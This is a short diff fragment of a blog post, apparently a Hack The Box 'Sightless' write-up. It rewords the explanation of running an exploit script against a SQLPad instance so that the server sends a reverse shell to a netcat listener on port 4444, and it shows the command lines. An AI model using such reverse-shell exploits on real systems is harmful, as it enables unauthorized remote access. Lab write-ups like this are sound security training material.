samh4cks/samh4cks.github.io/_posts/2024-12-01-sightless-hackthebox.md

 python3 exploit.py http://sqlpad.sightless.htb/ <Listener IP> <Listener Port>
 ```

-The above exploit requires target, listener IP address and listener port.
-Before using the above exploit, let's open netcat listener on port 4444.
-Exploit will send the query to the server and server initiate new connection along with payload and then send back the shell to netcat listener.
+The above exploit requires the target URL, listener IP, and listener port.
+Before executing, let's open a netcat listener on port 4444.
+The exploit sends the query to the server, which initiates a connection and sends back a shell to the netcat listener.

 ```bash
 python3 exploit.py http://sqlpad.sightless.htb/ 10.10.14.70 4444